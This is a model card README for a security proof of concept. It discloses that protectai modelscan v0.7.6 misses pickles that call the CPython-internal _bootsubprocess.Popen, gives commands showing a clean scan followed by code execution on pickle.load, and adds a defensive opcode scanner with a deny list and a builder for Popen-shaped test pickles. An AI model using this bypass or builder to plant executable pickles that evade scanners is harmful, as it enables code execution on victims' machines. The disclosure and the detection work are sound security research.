manja316
Add README
25137ea verified
metadata
tags:
  - security-research
  - proof-of-concept
license: mit

modelscan Bypass PoC: _bootsubprocess.Popen RCE

Security research only. Do not use maliciously.

This model file demonstrates a bypass of protectai/modelscan v0.7.6.

Vulnerability

modelscan's unsafe-globals list blocks subprocess but does NOT block _bootsubprocess, a CPython-internal module (Lib/_bootsubprocess.py, POSIX only) that provides a minimal Popen built directly on os.fork() and os.execv(). A pickle that imports _bootsubprocess.Popen instead of subprocess.Popen therefore passes the scan with no findings and still runs an arbitrary program when the file is loaded.

Verification

# Scan - reports no issues
modelscan scan -p model.pkl

# But executes arbitrary commands on load
python3 -c "import pickle; pickle.load(open('model.pkl','rb'))"
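The check a scanner needs in order to catch this, as an added example that is not part of this PoC and not modelscan's own code: walk the pickle opcode stream without ever unpickling, and flag every GLOBAL or STACK_GLOBAL that imports a module on a deny list that includes _bootsubprocess next to subprocess. The deny list, the small stack-tracking heuristic used to recover STACK_GLOBAL operands, and the sample pickles are constructed for this example; the samples are assembled byte by byte so the internal module is never imported and nothing is executed, and the argv used is /bin/true.

```python
"""Opcode-level check for pickles that reach a subprocess-like module.

Added example, not code from this PoC or from modelscan. It inspects the
opcode stream with pickletools and never calls pickle.load, so it is safe to
run on a hostile file. The deny list and the sample pickles are constructed
for this example.
"""
import pickletools

# Assumed deny list for this example (not modelscan's own settings):
# subprocess is what the scanner already flags, _bootsubprocess is the
# CPython-internal twin the PoC uses.
DENIED_MODULES = {"subprocess", "_bootsubprocess", "os", "posix"}

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
GET_OPS = {"GET", "BINGET", "LONG_BINGET"}
PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}


def referenced_globals(data):
    """Yield (module, name) for every GLOBAL / STACK_GLOBAL in `data`.

    GLOBAL carries both names inline. STACK_GLOBAL (protocol 4+) takes them
    from the unpickler stack, so string pushes, MEMOIZE/PUT and GET are
    tracked just far enough to recover them. This is a scanner heuristic
    that covers what pickle.dumps emits, not a full unpickler.
    """
    strings = []      # str values pushed and not yet consumed, newest last
    memo = {}         # memo slot -> last pushed value (None if not a str)
    last = None       # value pushed by the previous opcode, if it was a str
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            strings.append(arg)
            last = arg
        elif op.name in GET_OPS:
            last = memo.get(arg)
            if isinstance(last, str):
                strings.append(last)
        elif op.name == "MEMOIZE":
            memo[len(memo)] = last            # MEMOIZE uses the next free slot
        elif op.name in PUT_OPS:
            memo[arg] = last
        elif op.name == "GLOBAL":
            module, name = arg.split(" ", 1)  # pickletools joins the pair with a space
            yield module, name
            last = None
        elif op.name == "STACK_GLOBAL":
            if len(strings) >= 2:
                name = strings.pop()
                module = strings.pop()
                yield module, name
            last = None
        else:
            last = None


def scan_pickle(data):
    """Return sorted 'module.name' references that hit DENIED_MODULES."""
    return sorted({f"{m}.{n}" for m, n in referenced_globals(data)
                   if m in DENIED_MODULES})


def build_reduce_pickle(module, name, argv, protocol=4):
    """Constructed sample: a pickle that reduces to module.name(list(argv)).

    This is the shape of a Popen-style payload. Protocol 2 encodes the import
    as GLOBAL, protocol 4 as two SHORT_BINUNICODE pushes plus STACK_GLOBAL,
    so both scanner paths get exercised. Built by hand so the denied module
    is never imported here; strings are assumed shorter than 256 bytes.
    """
    def push_str(s):
        b = s.encode("utf-8")
        if protocol >= 4:
            return b"\x8c" + bytes([len(b)]) + b             # SHORT_BINUNICODE
        return b"X" + len(b).to_bytes(4, "little") + b      # BINUNICODE

    if protocol >= 4:
        out = (b"\x80\x04" + push_str(module) + b"\x94"      # PROTO, str, MEMOIZE
               + push_str(name) + b"\x94" + b"\x93")         # str, MEMOIZE, STACK_GLOBAL
    else:
        out = b"\x80\x02c" + f"{module}\n{name}\n".encode()  # PROTO, GLOBAL
    out += b"]"                                              # EMPTY_LIST
    for a in argv:
        out += push_str(a) + b"a"                            # push arg, APPEND
    return out + b"\x85R."                                   # TUPLE1, REDUCE, STOP


if __name__ == "__main__":
    # Same shape as the PoC model.pkl, with a harmless argv.
    poc = build_reduce_pickle("_bootsubprocess", "Popen", ["/bin/true"])
    print(scan_pickle(poc))                                  # ['_bootsubprocess.Popen']
    legacy = build_reduce_pickle("subprocess", "Popen", ["/bin/true"], protocol=2)
    print(scan_pickle(legacy))                               # ['subprocess.Popen']
```

The deny-list entry closes this one gap, but the shape of the bug is the lesson: any scanner that enumerates bad modules is only as complete as its list, and the standard library contains more than one path to exec. The robust controls are an allowlist of permitted globals (a restricted Unpickler whose find_class rejects everything else) or not loading pickle files from untrusted sources at all.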